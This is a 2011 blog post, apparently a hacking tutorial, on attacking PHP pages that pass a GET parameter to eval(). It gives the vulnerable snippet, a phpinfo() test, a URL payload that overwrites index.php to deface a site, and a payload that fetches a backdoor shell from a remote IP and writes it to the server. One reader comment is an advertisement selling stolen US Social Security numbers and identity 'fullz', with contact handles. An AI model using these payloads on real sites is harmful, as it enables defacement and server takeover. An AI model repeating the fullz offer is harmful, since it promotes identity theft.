Saturday 5 March 2011

Deface using EVAL() function



"Eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
The problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such. Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result."

Ok, this is our the vuln page :

<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>
Now lets go to the interesting part, to start we need to test if the page is vuln typing this :
http://mytargettest.com/hacktest/index.php?ev=phpinfo();
If you can see the phpinfo webpage, it means we can exploit it.
Now lets see what we can do .
1) You can just deface the index.php using this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced by Hacker"));fclose($z);

2) Or you can create your shell with this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z);

3) Browse your shell : http://mytargetest.com/hacktest/shell.php
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)

4 comments:

  1. Very nice tutorial.
    The question is how we know if the website parse variable that using eval() on the php script ??
    how to test the eval() vuln ??

    Thank you :)

    ReplyDelete
  2. By using a Web Vulnerability Scanner.

    ReplyDelete
  3. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete